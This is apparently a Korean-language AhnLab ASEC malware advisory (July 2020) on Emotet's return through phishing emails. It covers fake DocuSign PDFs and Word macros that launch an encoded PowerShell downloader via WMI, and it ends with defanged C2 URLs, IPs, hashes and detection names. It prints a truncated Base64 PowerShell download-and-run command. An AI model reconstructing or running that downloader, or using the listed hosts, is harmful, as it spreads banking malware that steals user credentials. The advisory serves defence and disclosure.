본문 바로가기
악성코드 정보

5개월만에 돌아온 Emotet 악성코드!! 국내 유포 중

by AhnLab ASEC 분석팀 2020. 7. 21.

ASEC 분석팀은 금일 Emotet 악성코드가 국내 유포 중인 것을 확인하였다. 뱅킹 악성코드인 Emotet 은 지난 2월을 마지막으로 유포를 중단하였으나, 5개월이 지난 현재 다시 유포를 시작한 것으로 보여 사용자의 주의가 필요하다.

 

유포 방식은 이전과 동일하게 피싱 메일을 통해 유포되고 있다. 메일의 유형은 세 가지가 존재하는데, 다운로드 링크가 첨부된 형태와 PDF 파일이 첨부된 형태, 악성 문서 파일을 첨부한 형태로 나뉜다. 첨부된 링크는 접속시 악성 문서 파일을 다운로드하게 된다.

 

사례1) 워드문서 다운로드 링크형태

 

사례2) PDF문서 첨부형태

 

사례3) 워드문서 첨부형태

 

메일에는 DOC 파일 뿐만 아니라, PDF 형태의 파일도 첨부되어 유포되고 있다. PDF 파일에는 아래와 같이 지불과 관련된 내용을 포함하고 있으며 DocuSign 사이트로 위장한 링크가 첨부되어 있다. 하지만 해당 링크는 "hxxp://braxmedia.nl/test/invoice/"  로 연결되어 악성 문서 파일을 다운로드하게 된다.

 

emotet 다운로드 주소로 연결되는 pdf

최종적으로 실행되는 문서 파일은 악성 매크로를 포함하고 있는 워드 파일이며, 매크로 사용을 유도하고 있다. Emotet 다운로더인 해당 유형은 작년 10월 블로그를 통해 공유하였으며, 현재 유포 중인 매크로의 동작 과정과 동일하다.

 

 

[주의] 문서 형태로 유포되는 이모텟(Emotet) 악성코드

안랩 ASEC 분석팀은 국내 사용자를 대상으로 악성 VBA 매크로를 포함하고 있는 Word 파일이 유포되고 있음을 확인하였다. 해당 악성 VBA 매크로는 WMI를 통해 powershell을 실행하여 Emotet 악성코드를 다�

asec.ahnlab.com

악성 매크로를 포함한 워드 파일

 매크로 실행시, WMI 를 통해 Base64 로 인코딩된 powershell 명령어를 실행한다. 해당 명령어는 5개의 url 을 통해 Emotet 을 다운받게 된다.

 

WMI 를 통해 실행되는 powershell

 

powersheLL -e JAB5AGkAeQBzAGEAbwBxAHUAdABoAGEAcgBzAG8AZQBxAHUAagBpAG8AYwBoAD0AJwBkAGEAe
… (중략) ...
cQB1AG8AYQBoAD0AJwB3AGEAdQB6AHQAaABvAHUAZAByAGkAYQB0AGcAdQB1AGMAaAB0AGkAYQBnAGMAdQBuACcA

 

디코딩된 파워쉘 명령어

 

과거 Emotet "--XXXXXXXX" 형식의 인자 값을 통해 실행되었지만, 현재 Emotet 은 특정 인자 값 없이 실행된다Emotet 이 동작하게 되면 C2 에 접속하여 공격자의 명령을 받아 악성 행위를 수행하며, 명령어에 따라 Emotet 업데이트, 악성모듈 또는 악성코드 다운로드를 수행할 수 있다. 악성 모듈은 사용자 정보를 탈취하는 정보 탈취 모듈과 공유 폴더 등을 이용한 전파 모듈이 존재한다. 또한 다운로드되는 악성코드는 Trickbot, Qakbot 과 같은 뱅킹 악성코드가 존재한다.

 

뱅킹형 악성코드인 Emotet 은 피싱 메일을 통해 다양한 형태로 대량 유포 중이므로 사용자는 출처가 불분명한 메일의 첨부 파일을 열람하지 않아야하며, 문서 파일 내부의 매크로를 실행하지 않아야한다.

 

현재 V3 제품에서는 관련 파일 및 URL 에 대하여 아래의 진단명으로 탐지 및 차단하고 있다.

 

[관련 IOC 정보]

 

[C2]

  • hxxp://biocharcoal.biz/assets/paclm/p1r67412932cras4kfuzu52xx9hf/
  • hxxp://gobisz.com/wp-content/wbhJWVHG/
  • hxxp://mytestingserver.ml/wp-admin/41m/
  • hxxps://gachchiuaxit.com/wp-admin/wkrl/
  • hxxp://ripro.martinface.com/wp-admin/nkf75/
  • hxxps://pan.martinface.com/CloudreveInstaller/gf6b59/
  • hxxp://108.48.41.69/
  • hxxp://201.173.217.124/

[HASH]

  • 409ef407df01d89c6873aeedf3e0fae4
  • 5b25288bd2ab2d4a5482847cda591912
  • 9b9ecfc4b5936ccd2ef06780819a0ced
  • 56f1eb5562803bd3b6de95210aedf8d4
  • 6f390b5ce578ea9da79d3de7004ea93e

[파일 진단]

  • Downloader/DOC.Emotet.S1072 (2020.01.31.04)
  • Downloader/MSOffice.Generic (2020.07.19.00)
  • Trojan/Win32.Emotet.C4164773 (2020.07.21.03)

[행위 진단]

  • Malware/MDP.Connect.M2367
  • Malware/MDP.Behavior.M2965

 

[C2 차단]

 

 

댓글0